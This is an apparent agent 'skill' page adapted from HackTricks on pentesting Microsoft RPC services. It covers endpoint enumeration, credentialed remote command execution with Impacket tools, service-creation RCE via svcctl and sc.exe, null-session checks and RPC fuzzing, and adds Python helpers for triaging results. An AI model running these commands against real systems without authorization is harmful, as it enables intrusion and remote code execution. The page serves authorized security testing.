Hacktricks-skills msrpc-pentesting

Pentest Microsoft RPC (MSRPC) services on ports 135, 593, 139, 445. Use this skill whenever you need to enumerate RPC endpoints, identify vulnerable interfaces, execute remote commands with valid credentials, or fuzz RPC services for vulnerabilities. Trigger this skill for any Windows network assessment involving RPC, DCOM, named pipes, or when you see open ports 135/593/139/445 during reconnaissance.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/135-pentesting-msrpc/SKILL.MD
source content

MSRPC Pentesting Skill

A comprehensive guide for testing Microsoft Remote Procedure Call (MSRPC) services during security assessments.

Quick Start

# Basic RPC enumeration
rpcdump.py <target-ip> -p 135

# Metasploit RPC scanner
use auxiliary/scanner/dcerpc/endpoint_mapper
set RHOSTS <target-ip>
run

# Execute with valid credentials
python3 dcomexec.py <domain>/<user>:<password>@<target-ip>

Port Overview

| Port | Protocol | Service |
|------|----------|---------|
| 135 | TCP/UDP | RPC Endpoint Mapper |
| 593 | TCP | HTTP RPC |
| 139 | TCP | NetBIOS/SMB RPC |
| 445 | TCP | Direct SMB RPC |

1. Enumerate RPC Services

Using rpcdump

# Basic enumeration
rpcdump.py <target-ip> -p 135

# With specific port
rpcdump.py <target-ip> -p <port>

Output format:

IFID: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
Annotation: Messenger Service
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncadg_ip_udp:<IP>[1028]

Using Metasploit

msfconsole

# Endpoint mapper scanner
use auxiliary/scanner/dcerpc/endpoint_mapper
set RHOSTS <target-ip>
run

# Hidden services scanner
use auxiliary/scanner/dcerpc/hidden
set RHOSTS <target-ip>
run

# Management interface scanner
use auxiliary/scanner/dcerpc/management
set RHOSTS <target-ip>
run

# TCP DCERPC auditor
use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
set RHOSTS <target-ip>
run

Using Impacket rpcmap

# rpcmap.py takes a string binding as its positional argument, not a host and a port
rpcmap.py 'ncacn_ip_tcp:<target-ip>[135]'

# With authentication on the RPC layer ([domain/]username[:password])
rpcmap.py 'ncacn_ip_tcp:<target-ip>[135]' -auth-rpc '<domain>/<user>:<password>'

2. Critical RPC Interfaces

These IFIDs represent high-value targets for enumeration and exploitation:

| IFID | Named Pipe | Purpose | Risk |
|------|------------|---------|------|
| 12345778-1234-abcd-ef00-0123456789ab | \pipe\lsarpc | User enumeration | Medium |
| 3919286a-b10c-11d0-9ba8-00c04fd92ef5 | \pipe\lsarpc | Domain/trust enumeration | Medium |
| 12345778-1234-abcd-ef00-0123456789ac | \pipe\samr | SAM database access | High |
| 1ff70682-0a51-30e8-076d-740be8cee98b | \pipe\atsvc | Task scheduler RCE | Critical |
| 338cd001-2244-31f1-aaaa-900038001003 | \pipe\winreg | Registry access | High |
| 367abb81-9844-35f1-ad32-98f038001003 | \pipe\svcctl | Service control RCE | Critical |
| 4b324fc8-1670-01d3-1278-5a47bf6ee188 | \pipe\srvsvc | Server services | High |
| 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 | \pipe\epmapper | DCOM/WMI access | Medium |
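As an added example (not code from the HackTricks skill or from Impacket), the following Python script parses the rpcdump-style record layout shown under "Output format" in section 1 and annotates each endpoint with the named pipe, purpose and risk from the table above, so an assessment report can lead with the highest-risk exposed interfaces. The sample listing embedded in it is constructed for the example; its addresses and annotation strings are illustrative.

```python
"""Triage an rpcdump-style endpoint listing against the critical-interface table.

Added example for this skill page (not code from HackTricks or Impacket).
Parses the four-line record layout shown under "Output format"
(IFID / Annotation / UUID / Binding) and tags each endpoint with the named
pipe, purpose and risk from the "Critical RPC Interfaces" table.
"""
from dataclasses import dataclass, field

# IFID -> (named pipe, purpose, risk), copied from the table in this section.
CRITICAL_IFIDS = {
    "12345778-1234-abcd-ef00-0123456789ab": (r"\pipe\lsarpc", "User enumeration", "Medium"),
    "3919286a-b10c-11d0-9ba8-00c04fd92ef5": (r"\pipe\lsarpc", "Domain/trust enumeration", "Medium"),
    "12345778-1234-abcd-ef00-0123456789ac": (r"\pipe\samr", "SAM database access", "High"),
    "1ff70682-0a51-30e8-076d-740be8cee98b": (r"\pipe\atsvc", "Task scheduler RCE", "Critical"),
    "338cd001-2244-31f1-aaaa-900038001003": (r"\pipe\winreg", "Registry access", "High"),
    "367abb81-9844-35f1-ad32-98f038001003": (r"\pipe\svcctl", "Service control RCE", "Critical"),
    "4b324fc8-1670-01d3-1278-5a47bf6ee188": (r"\pipe\srvsvc", "Server services", "High"),
    "4d9f4ab8-7d1c-11cf-861e-0020af6e7c57": (r"\pipe\epmapper", "DCOM/WMI access", "Medium"),
}
RISK_RANK = {"Critical": 3, "High": 2, "Medium": 1, "Info": 0}


@dataclass
class Endpoint:
    ifid: str
    version: str
    annotation: str = ""
    bindings: list = field(default_factory=list)
    pipe: str = ""
    purpose: str = "not in the critical-interface table"
    risk: str = "Info"


def parse_rpcdump(text: str) -> list:
    """Parse 'Key: value' records; a new record starts at every IFID line."""
    endpoints, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        key, _, value = line.partition(":")  # bindings contain ':' too, so split once
        key, value = key.strip().lower(), value.strip()
        if key == "ifid":
            parts = value.split()
            ifid = parts[0].lower()
            version = parts[2] if len(parts) >= 3 and parts[1] == "version" else "?"
            current = Endpoint(ifid=ifid, version=version)
            if ifid in CRITICAL_IFIDS:
                current.pipe, current.purpose, current.risk = CRITICAL_IFIDS[ifid]
            endpoints.append(current)
        elif current is None:
            continue  # stray line before the first record
        elif key == "annotation":
            current.annotation = value
        elif key == "binding":
            current.bindings.append(value)
    return endpoints


def prioritise(endpoints: list) -> list:
    """Highest risk first; sorted() is stable, so ties keep listing order."""
    return sorted(endpoints, key=lambda e: RISK_RANK[e.risk], reverse=True)


def risk_counts(endpoints: list) -> dict:
    counts = {}
    for e in endpoints:
        counts[e.risk] = counts.get(e.risk, 0) + 1
    return counts


# Constructed sample in the layout shown above (addresses and annotations are illustrative).
SAMPLE_LISTING = """\
IFID: 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc version 1.0
Annotation: Messenger Service
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncadg_ip_udp:10.0.0.5[1028]

IFID: 367ABB81-9844-35F1-AD32-98F038001003 version 2.0
Annotation: Service Control Manager
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncacn_np:10.0.0.5[\\pipe\\svcctl]
Binding: ncacn_ip_tcp:10.0.0.5[49152]

IFID: 12345778-1234-abcd-ef00-0123456789ac version 1.0
Annotation:
UUID: 00000000-0000-0000-0000-000000000000
Binding: ncacn_np:10.0.0.5[\\pipe\\samr]
"""

if __name__ == "__main__":
    ranked = prioritise(parse_rpcdump(SAMPLE_LISTING))
    for e in ranked:
        print(f"[{e.risk:8}] {e.ifid} v{e.version} {e.pipe or '-':16} {e.purpose}")
        for b in e.bindings:
            print(f"{'':11}{b}")
    print(risk_counts(ranked))
```

IFIDs are compared case-insensitively because rpcdump output and the table differ in case; anything not in the table is kept with risk "Info" rather than dropped, so the report still shows the full exposed surface.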

SAMR Interface - Password Brute Force

The SAMR interface exposes the SAM database; the source notes it can be used to brute-force passwords regardless of account lockout policy. Enumerate it with valid credentials via rpcclient:

# Using rpcclient
rpcclient -U "<user>%<password>" <target-ip>

# Enumerate users
enumdomusers

# Query user info
querydomuser <username>

Task Scheduler - Remote Command Execution

# Via the atsvc pipe (Impacket's ATSVC client is atexec.py; it needs valid credentials)
atexec.py <domain>/<user>:<password>@<target-ip> <command>

3. Remote Code Execution with Credentials

Using dcomexec.py

# Basic execution
python3 dcomexec.py <domain>/<user>:<password>@<target-ip>

# With specific object
python3 dcomexec.py <domain>/<user>:<password>@<target-ip> -object ShellWindows
python3 dcomexec.py <domain>/<user>:<password>@<target-ip> -object ShellBrowserWindow
python3 dcomexec.py <domain>/<user>:<password>@<target-ip> -object MMC20

# With an NTLM hash (Impacket takes it via -hashes LMHASH:NTHASH, not inside the target string)
python3 dcomexec.py <domain>/<user>@<target-ip> -hashes <lm-hash>:<nt-hash>

# With Kerberos
python3 dcomexec.py <domain>/<user>@<target-ip> -k

Try all three objects - different systems may have different DCOM configurations.

Using wmiexec.py

python3 wmiexec.py <domain>/<user>:<password>@<target-ip>

Using smbexec.py

python3 smbexec.py <domain>/<user>:<password>@<target-ip>

4. Port 593 (HTTP RPC)

# Using rpcdump.exe
rpcdump.exe <target-ip> -p 593

# Using curl for basic testing
curl -v http://<target-ip>:593/

5. IP Address Enumeration via IOXIDResolver

Abuse the ServerAlive2 method to enumerate network interfaces:

# Using IOXIDResolver
git clone https://github.com/mubix/IOXIDResolver
cd IOXIDResolver
python3 IOXIDResolver.py <target-ip>

# Alternative with rpcmap.py (the string binding is its positional argument)
rpcmap.py 'ncacn_ip_tcp:<target-ip>[135]'

This can reveal IPv6 addresses and network interface information without authentication.

6. Advanced: RPC Fuzzing

Using MS-RPC-Fuzzer

Warning: This is destructive testing. Always use isolated VM snapshots.

# Import the module
Import-Module .\MS-RPC-Fuzzer.psm1

# Inventory interfaces from a binary
Get-RpcServerData -Target "C:\Windows\System32\efssvc.dll" -OutPath .\output

# Or crawl entire System32
Get-RpcServerData -OutPath .\output

# Run the fuzzer
'.\output\rpcServerData.json' |
    Invoke-RpcFuzzer -OutPath .\output `
                     -MinStrLen 100  -MaxStrLen 1000 `
                     -MinIntSize 9999 -MaxIntSize 99999

# With sorted execution (respects parameter dependencies)
'.\output\rpcServerData.json' |
    Invoke-RpcFuzzer -OutPath .\output -Sorted

Output files:

  • allowed.json - Successful calls
  • denied.json - Access denied responses
  • error.json - Errors and crashes
  • log.txt - Full execution log (last line shows crash trigger)

Using NtObjectManager

# Install module
Install-Module NtObjectManager -Force

# Parse RPC interfaces
$rpcinterfaces = Get-RpcServer "C:\Windows\System32\efssvc.dll"
$rpcinterfaces | Format-Table Name,Uuid,Version,Procedures

# Inspect a procedure
$rpcinterfaces[0].Procedures[0] | Format-List *

# Generate C# client stub
Format-RpcClient $rpcinterfaces[0] -Namespace MS_EFSR -OutputPath .\MS_EFSR.cs

# Create interactive client
$client = Get-RpcClient $rpcinterfaces[0]
Connect-RpcClient $client -stringbinding 'ncacn_np:127.0.0.1[\\pipe\\efsrpc]' `
                     -AuthenticationLevel PacketPrivacy `
                     -AuthenticationType WinNT

# Invoke procedure
$ctx = New-Object Marshal.NdrContextHandle
$client.EfsRpcOpenFileRaw([ref]$ctx, "\\127.0.0.1\test", 0)

Context-Aware Fuzzing

Invoke-MSRPCFuzzer -Pipe "\\.\pipe\efsrpc" -Auth NTLM `
                   -MinLen 1  -MaxLen 0x400 `
                   -Iterations 100000 `
                   -OutDir .\results

7. Visualize with Neo4j

# Import fuzzing results to Neo4j
'.\output\allowed.json' |
    Import-DataToNeo4j -Neo4jHost 192.168.56.10:7474 -Neo4jUsername neo4j

Graph structure:

  • Nodes: RPC servers, interfaces, procedures
  • Relationships: ALLOWED, DENIED, ERROR interactions

Example Cypher query:

MATCH (p:Procedure)-[r:ERROR]->(c:Crash)
RETURN p.name, p.opnum, c.payload

8. Binding Types

| Binding | Protocol | Port | Use Case |
|---------|----------|------|----------|
| ncacn_ip_tcp | TCP | 135 | Direct TCP RPC |
| ncadg_ip_udp | UDP | 135 | UDP RPC |
| ncacn_np | SMB | 139/445 | Named pipe RPC |
| ncacn_http | HTTP | 593 | HTTP RPC |

9. Authentication Levels

# Available authentication levels
- None
- Connect
- Call
- Packet
- PacketIntegrity
- PacketPrivacy

# Available authentication types
- Null
- WinNT
- Kerberos
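Added example covering sections 8 and 9 together (not code from HackTricks, Impacket or NtObjectManager): a parser for the `proto:host[endpoint]` string bindings used by rpcdump, rpcmap and Connect-RpcClient above, plus a policy check that ranks the six authentication levels and flags interfaces reachable below a chosen minimum. The PacketIntegrity minimum and the sample observations are assumptions made for the example; the protocol and level tables are taken from the two sections above.

```python
"""Parse RPC string bindings and check negotiated authentication levels.

Added example for this skill page (not code from the page's tools). The
protocol-sequence table and the level/type lists come from sections 8 and 9;
the minimum level and the sample observations are assumptions.
"""
import re
from dataclasses import dataclass

# Protocol sequence -> (transport, well-known port(s), use case), from the Binding Types table.
PROTOCOL_SEQUENCES = {
    "ncacn_ip_tcp": ("TCP", (135,), "Direct TCP RPC"),
    "ncadg_ip_udp": ("UDP", (135,), "UDP RPC"),
    "ncacn_np": ("SMB", (139, 445), "Named pipe RPC"),
    "ncacn_http": ("HTTP", (593,), "HTTP RPC"),
}
# Ordered weakest to strongest, as listed under Authentication Levels.
AUTH_LEVELS = ("None", "Connect", "Call", "Packet", "PacketIntegrity", "PacketPrivacy")
AUTH_TYPES = ("Null", "WinNT", "Kerberos")

# proto:host[endpoint]; host may be empty, endpoint is a port or a pipe name.
_BINDING_RE = re.compile(r"^(?P<proto>[a-z_]+):(?P<host>[^\[\]]*)\[(?P<endpoint>[^\]]*)\]$")


@dataclass(frozen=True)
class StringBinding:
    protocol: str
    host: str
    endpoint: str

    @property
    def transport(self) -> str:
        return PROTOCOL_SEQUENCES[self.protocol][0]


def parse_string_binding(value: str) -> StringBinding:
    m = _BINDING_RE.match(value.strip())
    if not m or m["proto"] not in PROTOCOL_SEQUENCES:
        raise ValueError(f"unsupported string binding: {value!r}")
    return StringBinding(m["proto"], m["host"], m["endpoint"])


def auth_rank(level: str) -> int:
    if level not in AUTH_LEVELS:
        raise ValueError(f"unknown authentication level: {level!r}")
    return AUTH_LEVELS.index(level)


def assess(binding: str, auth_level: str, auth_type: str, minimum: str = "PacketIntegrity") -> list:
    """Return finding strings for one observed binding; an empty list means it meets the policy."""
    if auth_type not in AUTH_TYPES:
        raise ValueError(f"unknown authentication type: {auth_type!r}")
    b = parse_string_binding(binding)
    findings = []
    if auth_type == "Null" or auth_level == "None":
        findings.append(f"{b.protocol} endpoint {b.endpoint!r} accepts unauthenticated (null) access")
    elif auth_rank(auth_level) < auth_rank(minimum):
        findings.append(
            f"{b.protocol} endpoint {b.endpoint!r} negotiated {auth_level}, below the {minimum} "
            f"minimum: call payloads are not integrity-protected in transit"
        )
    if b.protocol == "ncacn_np" and not b.endpoint.lower().startswith("\\pipe\\"):
        findings.append(f"named-pipe binding with unexpected endpoint {b.endpoint!r}")
    return findings


def review(observations: list) -> dict:
    """Map each binding to its findings; bindings with no findings are omitted."""
    report = {}
    for binding, level, auth_type in observations:
        findings = assess(binding, level, auth_type)
        if findings:
            report[binding] = findings
    return report


# Constructed observations: (string binding, negotiated level, authentication type).
SAMPLE_OBSERVATIONS = [
    ("ncacn_np:10.0.0.5[\\pipe\\samr]", "None", "Null"),
    ("ncacn_ip_tcp:10.0.0.5[49152]", "Connect", "WinNT"),
    ("ncacn_http:10.0.0.5[593]", "PacketPrivacy", "Kerberos"),
]

if __name__ == "__main__":
    for binding, findings in review(SAMPLE_OBSERVATIONS).items():
        print(binding)
        for f in findings:
            print("  -", f)
```

The level ordering is what makes the check useful: a hardening review compares the negotiated level against a floor rather than against one exact value, so PacketPrivacy passes a PacketIntegrity policy while Connect and Call do not.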

10. Common Attack Patterns

Pattern 1: Null Session Enumeration

# Check for null session access (empty username, -N suppresses the password prompt)
rpcclient -U "" -N <target-ip>

# If successful, enumerate
enumdomusers
enumdomgroups

Pattern 2: Service Control RCE

# Via the svcctl pipe (Impacket's SCM client is services.py; it needs valid credentials)
services.py <domain>/<user>:<password>@<target-ip> create -name <service> -display <service> -path "<command>"
services.py <domain>/<user>:<password>@<target-ip> start -name <service>

# Or use sc.exe from Windows
sc \\<target-ip> create <service> binPath= "<command>"
sc \\<target-ip> start <service>

Pattern 3: Registry Manipulation

# Via the winreg pipe (Impacket's remote-registry client is reg.py; it needs valid credentials)
reg.py <domain>/<user>:<password>@<target-ip> query -keyName <key>

11. Safety Guidelines

⚠️ Critical Warnings:

  1. Always test in isolated environments - RPC fuzzing can cause BSODs
  2. Use VM snapshots - Restore after destructive testing
  3. Get authorization - Only test systems you own or have permission to test
  4. Monitor system stability - Many RPC services run as SYSTEM
  5. Document findings - Track which procedures cause crashes for PoC development

12. Troubleshooting

Connection refused on port 135

# Check if firewall is blocking
nmap -p 135 <target-ip>

# Try alternative ports
rpcdump.py <target-ip> -p 593

Authentication failures

# Try different auth methods
python3 dcomexec.py <domain>/<user>@<target-ip> -k -no-pass                  # Kerberos (ticket from KRB5CCNAME)
python3 dcomexec.py <domain>/<user>@<target-ip> -hashes <lm-hash>:<nt-hash>  # NTLM hash
python3 dcomexec.py <domain>/<user>@<target-ip> -no-pass                     # Skip the password prompt

Service crashes during fuzzing

# Check log.txt for last successful call
tail -n 10 log.txt

# Review error.json for crash details
cat error.json | jq '.[] | select(.status == "crash")'
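Added example (not code from MS-RPC-Fuzzer or HackTricks) for the "Output files" list in section 6 and the crash-triage steps just above: it deduplicates error.json crash entries by interface, procedure and opnum so each crashing procedure is documented once with its shortest triggering payload, and reads the last call recorded in log.txt, which the output-files note says is the crash trigger. The JSON field names (interface, procedure, opnum, status, payload), the log line layout, and the interface UUID in the sample are assumptions constructed for the example; check them against the real files before use.

```python
"""Triage fuzzer output: group crash records and find the last call before a crash.

Added example for this skill page (not MS-RPC-Fuzzer code). The record fields
and log layout are assumptions; the embedded samples are constructed.
"""
import json

# Constructed placeholder, not a real interface identifier.
PLACEHOLDER_IFID = "11111111-2222-3333-4444-555555555555"

# Constructed error.json content using the assumed field names.
SAMPLE_ERROR_JSON = json.dumps([
    {"interface": PLACEHOLDER_IFID, "procedure": "EfsRpcOpenFileRaw", "opnum": 0,
     "status": "crash", "payload": "A" * 1000},
    {"interface": PLACEHOLDER_IFID, "procedure": "EfsRpcOpenFileRaw", "opnum": 0,
     "status": "crash", "payload": "A" * 200},
    {"interface": PLACEHOLDER_IFID, "procedure": "HypotheticalProc", "opnum": 4,
     "status": "error", "payload": "B" * 10},
])

# Constructed log.txt content in an assumed one-call-per-line layout.
SAMPLE_LOG = """\
[1] CALL EfsRpcOpenFileRaw opnum=0 payload_len=10 -> allowed
[2] CALL EfsRpcOpenFileRaw opnum=0 payload_len=200 -> error
[3] CALL EfsRpcOpenFileRaw opnum=0 payload_len=1000 -> crash
"""


def crash_records(error_json_text: str) -> list:
    """Entries whose status is 'crash' (the same selection as the jq filter above)."""
    return [r for r in json.loads(error_json_text) if r.get("status") == "crash"]


def dedupe_crashes(records: list) -> dict:
    """(interface, procedure, opnum) -> {'count', 'min_payload_len'}.

    Keeping the shortest payload per procedure gives the smallest reproducer
    to document for each crash.
    """
    summary = {}
    for r in records:
        key = (r["interface"], r["procedure"], r["opnum"])
        entry = summary.setdefault(key, {"count": 0, "min_payload_len": None})
        entry["count"] += 1
        plen = len(r.get("payload", ""))
        if entry["min_payload_len"] is None or plen < entry["min_payload_len"]:
            entry["min_payload_len"] = plen
    return summary


def last_call(log_text: str) -> str:
    """Last non-empty line of log.txt, which the output-files note says is the trigger."""
    lines = [line for line in log_text.splitlines() if line.strip()]
    return lines[-1] if lines else ""


def triage(error_json_text: str, log_text: str) -> dict:
    """Combine both views into one structure suitable for a findings write-up."""
    return {
        "crashes": dedupe_crashes(crash_records(error_json_text)),
        "last_call": last_call(log_text),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_ERROR_JSON, SAMPLE_LOG)
    for (ifid, proc, opnum), info in result["crashes"].items():
        print(f"{ifid} {proc} (opnum {opnum}): {info['count']} crash(es), "
              f"shortest payload {info['min_payload_len']} bytes")
    print("last call before stop:", result["last_call"])
```

Grouping by (interface, procedure, opnum) rather than by payload is deliberate: a fuzzer typically hits the same faulty procedure many times with different inputs, and the write-up needs one entry per procedure with the smallest input that reproduces it.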

13. References

14. Quick Reference Card

# Enumeration
rpcdump.py <ip> -p 135
rpcmap.py <ip> -p 135

# RCE with credentials
dcomexec.py <user>:<pass>@<ip>
wmiexec.py <user>:<pass>@<ip>
smbexec.py <user>:<pass>@<ip>

# Metasploit
use auxiliary/scanner/dcerpc/endpoint_mapper
set RHOSTS <ip>
run

# Fuzzing (Windows only)
Get-RpcServerData -OutPath .\output
Invoke-RpcFuzzer -OutPath .\output

Remember: RPC vulnerabilities often lead to remote code execution or local privilege escalation. Always prioritize finding and documenting these issues during assessments.